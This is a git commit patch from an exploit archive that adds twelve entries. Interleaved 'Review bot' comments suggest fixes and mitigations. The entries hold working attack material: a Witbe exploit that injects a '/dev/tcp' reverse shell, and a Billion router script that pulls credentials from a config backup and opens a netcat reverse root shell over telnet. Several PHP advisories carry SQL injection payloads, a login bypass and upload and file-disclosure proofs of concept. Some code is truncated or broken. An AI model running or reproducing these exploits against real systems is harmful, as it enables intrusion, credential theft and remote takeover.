From cd9e638108f1b3ebfec3e6437c8c5474fadf8f30 Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Fri, 7 Oct 2016 05:01:18 +0000 Subject: [PATCH] DB: 2016-10-07 12 new exploits phpBB 2.0.10 - Remote Command Execution (CGI) Advance MLM Script - SQL Injection Picosafe Web Gui - Multiple Vulnerabilities Witbe - Remote Code Execution PHP Classifieds Rental Script - Blind SQL Injection B2B Portal Script - Blind SQL Injection MLM Unilevel Plan Script v1.0.2 - SQL Injection Just Dial Clone Script - SQL Injection Comodo Dragon Browser - Unquoted Service Path Privilege Escalation Billion Router 7700NR4 - Remote Command Execution Comodo Chromodo Browser - Unquoted Service Path Privilege Escalation Exagate WEBPack Management System - Multiple Vulnerabilities --- files.csv | 13 ++- platforms/cgi/webapps/40462.py | 39 +++++++++ platforms/hardware/remote/40472.py | 69 +++++++++++++++ platforms/hardware/remote/40474.txt | 100 ++++++++++++++++++++++ platforms/php/webapps/40454.txt | 65 ++++++++++++++ platforms/php/webapps/40466.txt | 60 +++++++++++++ platforms/php/webapps/40467.txt | 61 +++++++++++++ platforms/php/webapps/40468.txt | 61 +++++++++++++ platforms/php/webapps/40469.txt | 44 ++++++++++ platforms/php/webapps/40470.txt | 40 +++++++++ platforms/php/webapps/{673.cgi => 673.pl} | 0 platforms/windows/local/40471.txt | 53 ++++++++++++ platforms/windows/local/40473.txt | 53 ++++++++++++ 13 files changed, 657 insertions(+), 1 deletion(-) create mode 100755 platforms/cgi/webapps/40462.py create mode 100755 platforms/hardware/remote/40472.py create mode 100755 platforms/hardware/remote/40474.txt create mode 100755 platforms/php/webapps/40454.txt create mode 100755 platforms/php/webapps/40466.txt create mode 100755 platforms/php/webapps/40467.txt create mode 100755 platforms/php/webapps/40468.txt create mode 100755 platforms/php/webapps/40469.txt create mode 100755 platforms/php/webapps/40470.txt rename platforms/php/webapps/{673.cgi => 673.pl} (100%) create mode 100755 platforms/windows/local/40471.txt create mode 100755 
platforms/windows/local/40473.txt
diff --git a/files.csv b/files.csv
index c24279e4f..d0707003b 100755
--- a/files.csv
+++ b/files.csv
@@ -520,7 +520,7 @@ id,file,description,date,author,platform,type,port
 670,platforms/windows/remote/670.c,"Mercury Mail 4.01 - (Pegasus) IMAP Buffer Overflow (2)",2004-12-01,JohnH,windows,remote,143
 671,platforms/windows/dos/671.c,"Neverwinter Nights special - Fake Players Denial of Service",2004-12-01,"Luigi Auriemma",windows,dos,0
 672,platforms/windows/dos/672.c,"Kreed 1.05 - Format String / Denial of Service",2004-12-02,"Luigi Auriemma",windows,dos,0
-673,platforms/php/webapps/673.cgi,"phpBB 2.0.10 - Remote Command Execution (CGI)",2004-12-03,ZzagorR,php,webapps,0
+673,platforms/php/webapps/673.pl,"phpBB 2.0.10 - Remote Command Execution (CGI)",2004-12-03,ZzagorR,php,webapps,0
 675,platforms/windows/remote/675.txt,"Hosting Controller 0.6.1 Hotfix 1.4 - Directory Browsing",2004-12-05,Mouse,windows,remote,0
 676,platforms/php/webapps/676.c,"phpBB 1.0.0 / 2.0.10 - admin_cash.php Remote Exploit",2004-12-05,evilrabbi,php,webapps,0
 677,platforms/windows/dos/677.txt,"GetRight 5.2a - Skin File (.grs) Buffer Overflow",2004-12-06,ATmaCA,windows,dos,0
@@ -3881,6 +3881,7 @@ id,file,description,date,author,platform,type,port
 4226,platforms/windows/remote/4226.html,"Clever Internet ActiveX Suite 6.2 - Arbitrary File Download/Overwrite",2007-07-25,shinnai,windows,remote,0
 4227,platforms/windows/dos/4227.php,"PHP - PHP_gd2.dll imagepsloadfont Local Buffer Overflow (PoC)",2007-07-26,r0ut3r,windows,dos,0
 4228,platforms/windows/remote/4228.pl,"IPSwitch IMail Server 2006 9.10 - Subscribe Remote Overflow",2007-07-26,ZhenHan.Liu,windows,remote,143
+40466,platforms/php/webapps/40466.txt,"Advance MLM Script - SQL Injection",2016-10-06,OoN_Boy,php,webapps,0
 4229,platforms/windows/local/4229.pl,"CrystalPlayer 1.98 - '.mls' Local Buffer Overflow",2007-07-26,"Arham Muhammad",windows,local,0
 4230,platforms/windows/remote/4230.html,"Nessus Vulnerability Scanner 3.0.6 - ActiveX Remote Delete File Exploit",2007-07-26,h07,windows,remote,0
 4231,platforms/aix/local/4231.c,"IBM AIX 5.3 sp6 - capture Terminal Sequence Privilege Escalation",2007-07-27,qaaz,aix,local,0
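Review bot: The new row for 40466 is inserted at line 3884, between the 4228 and 4229 entries, while every other row this commit adds (40454 at line 36579, 40462–40474 in the last hunk) keeps the id order that files.csv otherwise follows. Unless the index is deliberately unsorted, the line `+40466,platforms/php/webapps/40466.txt,"Advance MLM Script - SQL Injection",2016-10-06,OoN_Boy,php,webapps,0` belongs in the final hunk after the 40462 row. Any consumer that assumes ascending ids, or merges the file by id, would presumably miss or misplace this entry.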
@@ -36575,6 +36576,7 @@ id,file,description,date,author,platform,type,port
 40450,platforms/linux/local/40450.txt,"Apache Tomcat 8/7/6 (Debian-Based Distros) - Privilege Escalation",2016-10-03,"Dawid Golunski",linux,local,0
 40451,platforms/win_x86-64/local/40451.rb,"Street Fighter 5 - 'Capcom.sys' Kernel Execution (Metasploit)",2016-10-03,"OJ Reeves",win_x86-64,local,0
 40452,platforms/windows/remote/40452.py,"Disk Pulse Enterprise 9.0.34 - Buffer Overflow",2016-10-03,Tulpa,windows,remote,80
+40454,platforms/php/webapps/40454.txt,"Picosafe Web Gui - Multiple Vulnerabilities",2016-10-05,"Shahab Shamsi",php,webapps,0
 40455,platforms/windows/remote/40455.py,"VX Search Enterprise 9.0.26 - Buffer Overflow",2016-10-05,Tulpa,windows,remote,80
 40456,platforms/windows/remote/40456.py,"Sync Breeze Enterprise 8.9.24 - Buffer Overflow",2016-10-05,Tulpa,windows,remote,80
 40457,platforms/windows/remote/40457.py,"Dup Scout Enterprise 9.0.28 - Buffer Overflow",2016-10-05,Tulpa,windows,remote,80
@@ -36582,3 +36584,12 @@ id,file,description,date,author,platform,type,port
 40459,platforms/windows/remote/40459.py,"Disk Savvy Enterprise 9.0.32 - Buffer Overflow",2016-10-05,Tulpa,windows,remote,80
 40460,platforms/windows/local/40460.txt,"Abyss Web Server X1 2.11.1 - Unquoted Service Path Privilege Escalation",2016-10-05,Tulpa,windows,local,0
 40461,platforms/windows/local/40461.txt,"Fortitude HTTP 1.0.4.0 - Unquoted Service Path Privilege Escalation",2016-10-05,Tulpa,windows,local,0
+40462,platforms/cgi/webapps/40462.py,"Witbe - Remote Code Execution",2016-10-05,BeLmar,cgi,webapps,0
+40467,platforms/php/webapps/40467.txt,"PHP Classifieds Rental Script - Blind SQL Injection",2016-10-06,OoN_Boy,php,webapps,0
+40468,platforms/php/webapps/40468.txt,"B2B Portal Script - Blind SQL Injection",2016-10-06,OoN_Boy,php,webapps,0
+40469,platforms/php/webapps/40469.txt,"MLM Unilevel Plan Script v1.0.2 - SQL Injection",2016-10-06,N4TuraL,php,webapps,0
+40470,platforms/php/webapps/40470.txt,"Just Dial Clone Script - SQL Injection",2016-10-06,OoN_Boy,php,webapps,0
+40471,platforms/windows/local/40471.txt,"Comodo Dragon Browser - Unquoted Service Path Privilege Escalation",2016-10-06,@Th3GundY,windows,local,0
+40472,platforms/hardware/remote/40472.py,"Billion Router 7700NR4 - Remote Command Execution",2016-10-06,R-73eN,hardware,remote,0
+40473,platforms/windows/local/40473.txt,"Comodo Chromodo Browser - Unquoted Service Path Privilege Escalation",2016-10-06,@Th3GundY,windows,local,0
+40474,platforms/hardware/remote/40474.txt,"Exagate WEBPack Management System - Multiple Vulnerabilities",2016-10-06,"Halil Dalabasmaz",hardware,remote,0
diff --git a/platforms/cgi/webapps/40462.py b/platforms/cgi/webapps/40462.py
new file mode 100755
index 000000000..494398a6e
--- /dev/null
+++ b/platforms/cgi/webapps/40462.py
@@ -0,0 +1,39 @@
+#!/usr/bin/python
+# Exploit Title: Witbe RCE (Remote Code Execution)
+# Exploit Author: BeLmar
+# Date: 05/10/2016
+# DEMO : https://youtu.be/ooUFXfUfIs0
+# Contact : hb.mz093@gmail.com
+# Vendor Homepage: http://www.witbe.net
+# Tested on: Windows7/10 & BackBox
+# Category: Remote Exploits
+
+import urllib
+import urllib2
+import os
+
+print " M MW M M XXMMrX, 2Mr72S MW7XS"
+print " MM MM M2 M SM MM MM M "
+print " M M ZM M M XM MMir0M MMrXS"
+print " MM M M M: M SM MM ZM M2 "
+print " MMa MMM M ZM MM XM M "
+print " XM M M iM 8MZ8W8 MM8BB"
+print " EXPLOIT BY BELMAR "
+print ""
+
+print "Run NetCat Listner" # First Run Netcat Listner
+
+rhost = raw_input('RHOST: ')
+lhost = raw_input('LHOST: ')
+lport = raw_input('LPORT: ')
+
+url = 'http://'+rhost+'/cgi-bin/applyConfig.pl'
+user_agent = 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36'
+values = {'auth_login': '', #Leave it as it is
+ 'auth_pwd': '', #Leave it as it is
+ 'file': 'set|bash -i >& /dev/tcp/'+lhost+'/'+lport+' 0>&1' }
+
+data = urllib.urlencode(values)
+req = urllib2.Request(url, data)
+response = urllib2.urlopen(req)
+the_page = response.read()
\ No newline at end of file
diff --git a/platforms/hardware/remote/40472.py b/platforms/hardware/remote/40472.py
new file mode 100755
index 000000000..7105d9cd0
--- /dev/null
+++ b/platforms/hardware/remote/40472.py
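Review bot: The header block records no affected version, vendor response or disclosure timeline, so a reader cannot tell which Witbe builds expose the `file` parameter of `/cgi-bin/applyConfig.pl` or whether a fixed release exists; the other entries in this commit (40471, 40473) carry a `# Version:` line and a timeline, and this one should at least state `# Version: unknown` and `# Vendor notified: unknown` rather than omit the fields. Judging from the `'file'` value, the CGI presumably hands the parameter to a shell unescaped, so the remediation to record is validating it against an allow-list of expected file names and never interpolating it into a command; on the monitoring side, POSTs to applyConfig.pl whose `file` value contains shell metacharacters are a cheap log signature. On style, `import os` and `user_agent` are never used, and `the_page` is read but discarded.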
@@ -0,0 +1,69 @@
+# Title : Billion Router 7700NR4 Remote Root Command Execution
+# Date : 06/10/2016
+# Author : R-73eN
+# Tested on: Billion Router 7700NR4
+# Vendor : http://www.billion.com/
+# Vulnerability Description:
+# This router is a widely used here in Albania. It is given by a telecom provider to the home and bussiness users.
+# The problem is that this router has hardcoded credentials which "can not be changed" by a normal user. Using these
+# credentials we don't have to much access but the lack of authentication security we can download the backup and get the admin password.
+# Using that password we can login to telnet server and use a shell escape to get a reverse root connection.
+# You must change host with the target and reverse_ip with your attacking ip.
+# Fix:
+# The only fix is hacking your router with this exploit, changing the credentials and disabling all the other services using iptables.
+#
+
+import requests
+import base64
+import socket
+import time
+
+host = ""
+def_user = "user"
+def_pass = "user"
+reverse_ip = ""
+#Banner
+banner = ""
+banner +=" ___ __ ____ _ _ \n"
+banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"
+banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"
+banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"
+banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n"
+print banner
+
+
+# limited shell escape
+evil = 'ping ;rm /tmp/backpipe;cd tmp;echo "mknod backpipe p && nc ' + reverse_ip + ' 1337 0backpipe &" > /tmp/rev.sh;chmod +x rev.sh;sh /tmp/rev.sh &'
+
+def execute_payload(password):
+ print "[+] Please run nc -lvp 1337 and then press any key [+]"
+ raw_input()
+ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ s.connect((host,23))
+ s.recv(1024)
+ s.send("admin\r")
+ a= s.recv(1024)
+ time.sleep(1)
+ s.send(password +"\r")
+ time.sleep(1)
+ s.recv(1024)
+ s.send(evil + "\r")
+ time.sleep(1)
+ print "[+] If everything worked you should get a reverse shell [+]"
+ print "[+] Warning pressing any key will close the SHELL [+]"
+ raw_input()
+
+
+
+
+r = requests.get("http://" + host + "/backupsettings.conf" , auth=(def_user,def_pass))
+if(r.status_code == 200):
+ print "[+] Seems the exploit worked [+]"
+ print "[+] Dumping data . . . [+]"
+ temp = r.text
+ admin_pass = temp.split("")[1].split("")[0]
+# print "[+] Admin password : " + str(base64.b64decode(admin_pass)) + " [+]"
+ execute_payload(str(base64.b64decode(admin_pass)))
+else:
+ print "[-] Exploit Failed [-]"
+print "\n[+] https://www.infogen.al/ [+]\n\n"
diff --git a/platforms/hardware/remote/40474.txt b/platforms/hardware/remote/40474.txt
new file mode 100755
index 000000000..41c792f25
--- /dev/null
+++ b/platforms/hardware/remote/40474.txt
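Review bot: `admin_pass = temp.split("")[1].split("")[0]` (line 64) raises `ValueError: empty separator` under Python 2, so the file as committed stops before `execute_payload` is ever reached; the empty separators look like an import artefact rather than the author's text and the entry should be checked against the original submission. The `# Fix:` comment (line 13) tells readers that the only fix is to run this exploit against their own router, which is not a mitigation an operator can be given; a defensive line such as `# Mitigation: keep the HTTP and telnet management services off the WAN interface and ask the provider for firmware that allows the credentials to be changed` follows directly from what the description already states (backup served under Basic auth with the fixed `user`/`user` account, telnet on port 23 accepting the recovered password). `host` and `reverse_ip` are hardcoded as empty strings with no argument parsing, so the script cannot run without being edited, which the header says only in prose.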
@@ -0,0 +1,100 @@ +Document Title: +================ +Exagate WEBpack Management System Multiple Vulnerabilities + +Author: +======== +Halil Dalabasmaz + +Release Date: +============== +07 OCT 2016 + +Product & Service Introduction: +================================ +WEBPack is the individual built-in user-friendly and skilled web +interface allowing web-based access to the main units of the SYSGuard +and POWERGuard series. The advanced software enables the users to +design their customized dashboard smoothly for a detailed monitoring +and management of all the power outlet sockets & sensor and volt free +contact ports, as well as relay outputs. User definition and authorization, +remote access and update, detailed reporting and archiving are among the +many features. + +Vendor Homepage: +================= +http://www.exagate.com/ + +Vulnerability Information: +=========================== +Exagate company uses WEBPack Management System software on the hardware. +The software is web-based and it is provide control on the hardware. There are +multiple vulnerabilities on that software. + +Vulnerability #1: SQL Injection +================================ + +There is no any filtering or validation mechanisim on "login.php". "username" +and "password" inputs are vulnerable to SQL Injection attacks. Sample POST +request is given below. + +POST /login.php HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: close +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +Content-Length: 37 + +username=root&password=' or 1=1-- + +Vulnerability #2: Unauthorized Access To Sensetive Information +=============================================================== + +The software is capable of sending e-mail to system admins. 
But there is no +any authorization mechanism to access e-mail logs. The e-mail logs can accessable +anonymously from "http:///emaillog.txt". + +Vulnerability #3: Unremoved Configuration Files +================================================ + +The software contains the PHP Info file on the following URL. + +http:///api/phpinfo.php + +Vulnerability Disclosure Timeline: +================================== +03 OCT 2016 - Attempted to contact vendor after discovery of vulnerabilities +06 OCT 2016 - No response from vendor and re-attempted to contact vendor +07 OCT 2016 - No response from vendor +07 OCT 2016 - Public Disclosure + +Discovery Status: +================== +Published + +Affected Product(s): +===================== +Exagate SYSGuard 3001 (Most probably all Exagate hardwares affected that vulnerabilities) + +Tested On: +=========== +Exagate SYSGuard 3001 + +Disclaimer & Information: +========================== +The information provided in this advisory is provided as it is without +any warranty. BGA disclaims all warranties, either expressed or implied, +including the warranties of merchantability and capability for a particular +purpose. BGA or its suppliers are not liable in any case of damage, including +direct, indirect, incidental, consequential loss of business profits or +special damages. + +Domain: www.bgasecurity.com +Social: twitter.com/bgasecurity +Contact: advisory@bga.com.tr + +Copyright © 2016 | BGA Security LLC \ No newline at end of file diff --git a/platforms/php/webapps/40454.txt b/platforms/php/webapps/40454.txt new file mode 100755 index 000000000..0df104b31 --- /dev/null +++ b/platforms/php/webapps/40454.txt 
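Review bot: The advisory has no remediation section, so none of the three findings is paired with its fix: parameterised queries (at minimum input validation) for the `username` and `password` fields handled by `login.php`, an authentication check before `emaillog.txt` is served, and removal of `api/phpinfo.php` from production firmware. Under "Affected Product(s)" the text says `Most probably all Exagate hardwares affected` while "Tested On" lists only SYSGuard 3001; the wider claim is untested and should be labelled as such rather than stated as affected. The sample request's `Host:` header and both URLs have lost their host component (`http:///emaillog.txt`, `http:///api/phpinfo.php`), presumably during import, and would read correctly with an explicit placeholder such as `http://<target>/emaillog.txt`.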
@@ -0,0 +1,65 @@ +[-] Title : Picosafe Web Gui - Multiple Vulnerabilities +[-] Author : Shahab Shamsi +[-] Vendor : https://github.com/embeddedprojects/picosafe_webgui +[-] Category : Webapps +[-] Date : 01.October.2016 + + + +Vulnerable page : +picosafe_webgui/webinterface/js/filemanager/filemanager.php + + + + +========================== +| Remote File Upload : +========================== +Vulnerable Source (RFU) : +52: chmod($to, 0755); +48: $to = realpath($curdir) . '/' . $name; +40: function uploadfile($curdir) +46: $name = $_FILES['files']['name'][0]; + +Exploit : +"@$uploadfile")); +curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1); +$result = curl_exec($ch); +curl_close($ch); +print "$result"; +?> + +Location : +http://localhost:8282/picosafe_webgui/webinterface/js/filemanager/FileName + + +========================== +| Local File Disclosure : +========================== + +Vulnerable Source (LFD) : +17: $file = base64_decode($_GET['file']); +18: DownloadFile($file); +111: readfile($file); + +POC : +http://localhost:8282/picosafe_webgui/webinterface/js/filemanager/filemanager.php?file=base64code-Filename + + +========================== +| Cross-Site Scripting : +========================== + +Vulnerable Source (XSS) : +8: echo json_encode($data); +7: $data = sortfiles($data); +6: $data = listdirectory($directory); +5: $directory = base64_decode($_GET['directory']); + +POC : +http://localhost:8282/picosafe_webgui/webinterface/js/filemanager/filemanager.php?directory=Base64-ScriptingCode \ No newline at end of file diff --git a/platforms/php/webapps/40466.txt b/platforms/php/webapps/40466.txt new file mode 100755 index 000000000..8a8a0b806 --- /dev/null +++ b/platforms/php/webapps/40466.txt 
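Review bot: The "Exploit" section opens mid-statement with `"@$uploadfile"));`, so the PHP listing in the archive copy is incomplete and the entry should be re-imported from the original submission. The quoted source lines already point at the fix for each finding and the advisory should say so: line 46 takes `$name` straight from `$_FILES['files']['name'][0]` and line 48 joins it onto `realpath($curdir)`, so applying `basename()`, an extension allow-list and no `chmod 0755` on uploaded files would close the upload issue, while lines 17 and 5 `base64_decode()` a request parameter and hand it to `readfile()`/`listdirectory()`, so the decoded path must be constrained to the file-manager root before use. The "Vulnerable Source" line numbers are also listed out of order (52, 48, 40, 46), which makes the flow hard to follow.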
@@ -0,0 +1,60 @@ +[x]========================================================================================================================================[x] + | Title : Advance MLM Script SQL Vulnerabilities + | Software : Advance MLM Script + | Vendor : http://www.i-netsolution.com/ + | Demo : http://www.i-netsolution.com/item/advance-mlm-script/live_demo/236431 + | Google Dork : news_detail.php?newid= © MLM SCRIPT + | Date : 06 October 2016 + | Author : OoN_Boy +[x]========================================================================================================================================[x] + + + +[x]========================================================================================================================================[x] + | Technology : PHP + | Database : MySQL + | Price : $ 199 + | Description : MLM business upward day by day, Open Source MLM Script plays an important role for successful multilevel marketing business. + Our advanced featured PHP MLM Script enables MLM companies to manage and run their express selling business more effectively towards a successful way. 
+[x]========================================================================================================================================[x] + + +[x]========================================================================================================================================[x] + | Exploit : http://localhost/mlm/news_detail.php?newid=%Inject_Here%26 + | Aadmin Page : http://localhost/[path]/admin/index.php +[x]========================================================================================================================================[x] + + + +[x]========================================================================================================================================[x] + | Proof of concept : sqlmap -u "http://localhost/mlm/news_detail.php?newid=26" --invalid-string +[x]========================================================================================================================================[x] + + --- +Parameter: newid (GET) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: newid=26' AND 4440=4440 AND 'AJmz'='AJmz + + Type: AND/OR time-based blind + Title: MySQL >= 5.0.12 OR time-based blind + Payload: newid=26' OR SLEEP(5) AND 'FokP'='FokP + + Type: UNION query + Title: Generic UNION query (NULL) - 6 columns + Payload: newid=jMCtRq' UNION ALL SELECT NULL,CONCAT(0x71787a7a71,0x48755652787877617966627661486164744748424b6155564f514370537747504c6e736876665150,0x7178787171),NULL,NULL,NULL,NULL-- Afye +--- + +[x]========================================================================================================================================[x] + + + +[x]========================================================================================================================================[x] + | Greetz : antisecurity.org batamhacker.or.id + | Vrs-hCk NoGe Jack zxvf Angela Zhang aJe H312Y yooogy mousekill }^-^{ martfella noname s4va + | k1tk4t str0ke kaka11 ^s0n g0ku^ 
Joe Chawanua Ntc xx_user s3t4n IrcMafia em|nem Pandoe Ronny rere +[x]========================================================================================================================================[x] + +[x]========================================================================================================================================[x] +| Hi All long time no see ^_^ +[x]========================================================================================================================================[x] \ No newline at end of file diff --git a/platforms/php/webapps/40467.txt b/platforms/php/webapps/40467.txt new file mode 100755 index 000000000..182840b01 --- /dev/null +++ b/platforms/php/webapps/40467.txt 
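Review bot: None of the i-netsolution advisories in this commit (this one, 40467, 40468, 40469 and 40470) states an affected version, whether the vendor was notified, or whether a fix exists, so an operator running one of these scripts has nothing to act on; each header table should carry at least `| Version : unknown` and `| Vendor notified : no` lines. The mitigation is the same across all five and fits on one `| Fix :` line: the `newid`, `refid`, `pid` and `fid` parameters are evidently concatenated into SQL, and prepared statements (or casting these numeric ids to integers before use) remove the injection. `| Aadmin Page` in 40466, 40467 and 40468 is a typo for `| Admin Page` (40470 spells it correctly), and the `Description` block in 40467 is cut off after `this Property Rental Script`.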
@@ -0,0 +1,61 @@ +[x]========================================================================================================================================[x] + | Title : PHP Classifieds Rental Script Blind SQL Vulnerabilities + | Software : PHP Classifieds Rental Script + | Vendor : http://www.i-netsolution.com/ + | Demo : http://www.i-netsolution.com/item/php-classifieds-rental-script/244993 + | Date : 06 October 2016 + | Author : OoN_Boy +[x]========================================================================================================================================[x] + + + +[x]========================================================================================================================================[x] + | Technology : PHP + | Database : MySQL + | Price : $ 99 + | Description : PHP Classifieds Rental Script The PHP Rental Classifieds Script is one among the limited software's, which are designed + so user-friendly that anyone with minimal knowledge of operating a computer can utilize it to its optimum. 
Besides being + an easy-to- use software, this Property Rental Script +[x]========================================================================================================================================[x] + + +[x]========================================================================================================================================[x] + | Exploit : http://localhost/product_details.php?refid=%Inject_Here%1319258872 + | Aadmin Page : http://localhost/[path]/admin/index.php +[x]========================================================================================================================================[x] + + + +[x]========================================================================================================================================[x] + | Proof of concept : sqlmap -u "http://localhost/product_details.php?refid=1319258872" --invalid-string +[x]========================================================================================================================================[x] + + --- +Parameter: refid (GET) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: refid=1319258872' AND 3912=3912 AND 'HTMi'='HTMi + + Type: AND/OR time-based blind + Title: MySQL >= 5.0.12 OR time-based blind + Payload: refid=1319258872' OR SLEEP(5) AND 'QwXZ'='QwXZ + + Type: UNION query + Title: MySQL UNION query (NULL) - 26 columns + Payload: refid=xCUcyB' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a787671,0x644e6e5046537647684864705a527667796f454c666c4656644a73506d4e627a48574969424a4756,0x7176786271),NULL,NULL,NULL,NULL,NULL# +--- + + +[x]========================================================================================================================================[x] + + + 
+[x]========================================================================================================================================[x] + | Greetz : antisecurity.org batamhacker.or.id + | Vrs-hCk NoGe Jack zxvf Angela Zhang aJe H312Y yooogy mousekill }^-^{ martfella noname s4va + | k1tk4t str0ke kaka11 ^s0n g0ku^ Joe Chawanua Ntc xx_user s3t4n IrcMafia em|nem Pandoe Ronny rere +[x]========================================================================================================================================[x] + +[x]========================================================================================================================================[x] +| Hi All long time no see ^_^ +[x]========================================================================================================================================[x] \ No newline at end of file diff --git a/platforms/php/webapps/40468.txt b/platforms/php/webapps/40468.txt new file mode 100755 index 000000000..95084f4dc --- /dev/null +++ b/platforms/php/webapps/40468.txt 
@@ -0,0 +1,61 @@ +[x]========================================================================================================================================[x] + | Title : B2B Portal Script Blind SQL Vulnerabilities + | Software : B2B Portal Script + | Vendor : http://www.i-netsolution.com/ + | Demo : http://www.i-netsolution.com/item/b2b-portal-script/live_demo/190275 + | Date : 06 October 2016 + | Author : OoN_Boy +[x]========================================================================================================================================[x] + + + +[x]========================================================================================================================================[x] + | Technology : PHP + | Database : MySQL + | Price : $ 249 + | Description : Have an idea about starting your own Alibaba clone website and thinking how to implement it? Our B2B Portal Script + is the platform to transform your idea into the practical world. It is developed in PHP and MySQL and can help global + portals to manage their online transactions with efficiency +[x]========================================================================================================================================[x] + + +[x]========================================================================================================================================[x] + | Exploit : http://localhost/advancedb2b/view-product.php?pid=294' + | Aadmin Page : http://localhost/[path]/admin/index.php +[x]========================================================================================================================================[x] + + + +[x]========================================================================================================================================[x] + | Proof of concept : sqlmap -u "http://localhost/advancedb2b/view-product.php?pid=294" 
+[x]========================================================================================================================================[x] + +--- +Parameter: pid (GET) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: pid=294' AND 1754=1754 AND 'whqn'='whqn + + Type: AND/OR time-based blind + Title: MySQL >= 5.0.12 AND time-based blind + Payload: pid=294' AND SLEEP(5) AND 'nGqC'='nGqC + + Type: UNION query + Title: Generic UNION query (NULL) - 33 columns + Payload: pid=294' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178766b71,0x656f5962547177636a47435158754754736267535a4d515a4d4c454e535052496652505243795849,0x7176626271),NULL,NULL-- lwGp +--- + + +[x]========================================================================================================================================[x] + + + +[x]========================================================================================================================================[x] + | Greetz : antisecurity.org batamhacker.or.id + | Vrs-hCk NoGe Jack zxvf Angela Zhang aJe H312Y yooogy mousekill }^-^{ martfella noname s4va + | k1tk4t str0ke kaka11 ^s0n g0ku^ Joe Chawanua Ntc xx_user s3t4n IrcMafia em|nem Pandoe Ronny rere +[x]========================================================================================================================================[x] + +[x]========================================================================================================================================[x] +| Hi All long time no see ^_^ +[x]========================================================================================================================================[x] \ No newline at end of file diff --git a/platforms/php/webapps/40469.txt b/platforms/php/webapps/40469.txt new file mode 100755 index 000000000..d1010c128 
--- /dev/null +++ b/platforms/php/webapps/40469.txt @@ -0,0 +1,44 @@ +###################### +# Application Name : MLM Unilevel Plan Script v1.0.2 + +# Exploit Author : Cyber Warrior | Bug Researchers Group | N4TuraL + +# Author Contact : https://twitter.com/byn4tural + +# Vendor Homepage : http://www.i-netsolution.com/ + +# Vulnerable Type : SQL Injection + +# Date : 2016-10-06 + +# Tested on : Windows 10 / Mozilla Firefox +# Linux / Mozilla Firefox +# Linux / sqlmap 1.0.6.28#dev + +###################### SQL Injection Vulnerability ###################### + +# Location : +http://localhost/[path]/news_detail.php + +###################### + +# PoC Exploit: + +http://localhost/[path]/news_detail.php?newid=11%27%20%2F*%2130000and%20ascii%28substring%28%28database%28%29%29%2C4%2C1%29%29%3C115%20and*%2F%20%27x%27%3D%27x + +# Exploit Code via sqlmap: + +sqlmap -u http://localhost/[path]/news_detail.php?newid=11 --dbs + +--- +Parameter: newid (GET) + Type: AND/OR time-based blind + Title: MySQL >= 5.0.12 AND time-based blind + Payload: newid=11' AND SLEEP(5) AND 'HheB'='HheB +--- +[18:47:12] [INFO] the back-end DBMS is MySQL +web application technology: Nginx +back-end DBMS: MySQL >= 5.0.12 + +###################### + diff --git a/platforms/php/webapps/40470.txt b/platforms/php/webapps/40470.txt new file mode 100755 index 000000000..2be0fe9a0 --- /dev/null +++ b/platforms/php/webapps/40470.txt 
@@ -0,0 +1,40 @@ +[x]========================================================================================================================================[x] + | Title : Just Dial Clone Script SQL & XSS Vulnerabilities + | Software : Just Dial Clone + | Vendor : http://www.i-netsolution.com/ + | Demo : http://www.i-netsolution.com/item/just-dial-clone/live_demo/423618 + | Date : 06 October 2016 + | Author : OoN_Boy +[x]========================================================================================================================================[x] + + + +[x]========================================================================================================================================[x] + | Technology : PHP + | Database : MySQL + | Price : $ 299 + | Description : If you wish to launch your own business directory website, we have a readymade solution for you which supports unlimited + categories, uses and secure code. Our Company Catalogue Listing Script is just the right script for you +[x]========================================================================================================================================[x] + + +[x]========================================================================================================================================[x] + | Exploit : http://localhost/jus/restaurants-details.php?fid=%Inject_Here%21 + | Admin Page : http://localhost/[path]/admin/index.php +[x]========================================================================================================================================[x] + + + +[x]========================================================================================================================================[x] + | Proof of concept SQL : http://localhost/jus/restaurants-details.php?fid=%Inject_Here%21 +[x]========================================================================================================================================[x] + 
+[x]========================================================================================================================================[x] + | Greetz : antisecurity.org batamhacker.or.id + | Vrs-hCk NoGe Jack zxvf Angela h4ntu reel dono Zhang aJe H312Y yooogy mousekill }^-^{ martfella noname s4va + | k1tk4t str0ke kaka11 ^s0n g0ku^ Joe Chawanua Ntc xx_user s3t4n IrcMafia em|nem Pandoe Ronny rere +[x]========================================================================================================================================[x] + +[x]========================================================================================================================================[x] +| Hi All long time no see ^_^ +[x]========================================================================================================================================[x] \ No newline at end of file diff --git a/platforms/php/webapps/673.cgi b/platforms/php/webapps/673.pl similarity index 100% rename from platforms/php/webapps/673.cgi rename to platforms/php/webapps/673.pl diff --git a/platforms/windows/local/40471.txt b/platforms/windows/local/40471.txt new file mode 100755 index 000000000..0b1b8acfd --- /dev/null +++ b/platforms/windows/local/40471.txt 
@@ -0,0 +1,53 @@
+# Exploit Title: Comodo Dragon Browser Unquoted Service Path Privilege Escalation
+# Date: 24/09/2016
+# Author: Yunus YILDIRIM (@Th3GundY)
